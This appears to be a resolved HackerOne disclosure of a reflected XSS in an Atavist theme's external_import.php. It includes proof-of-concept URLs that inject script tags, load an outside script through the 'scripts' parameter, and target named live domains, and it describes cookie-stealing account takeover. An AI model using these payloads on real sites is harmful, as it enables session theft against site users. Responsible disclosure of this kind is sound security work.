Reflected XSS on a Atavist theme at external_import.php

Disclosed: 2020-11-18 14:21:52 By bugra To automattic
High
Vulnerability Details
## Summary: Hi team, I found this php file https://magazine.atavist.com/static/external_import.php , and there is a parameter called `scripts` on this php file. Basically, the endpoint prints value of `scripts` parameter to `<script src='$Value'>`. So we can import any script file like that : https://magazine.atavist.com/static/external_import.php?scripts=//15.rs Or we can write HTML tags too, there is no encoding : https://magazine.atavist.com/static/external_import.php?scripts=%27%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E This endpoint is also available on other websites. Like : https://docs.atavist.com/static/external_import.php?scripts=%27%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.377union.com/static/external_import.php?scripts=%27%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E Also there is no secure flag on the session cookie (`periodicSessionatavist`). So this XSS leads to account takeover. ## Impact Reflected XSS - account takeover via cookie stealing Thanks, Bugra
Actions
View on HackerOne
Report Stats
  • Report ID: 976657
  • State: Closed
  • Substate: resolved
  • Upvotes: 14
Share this report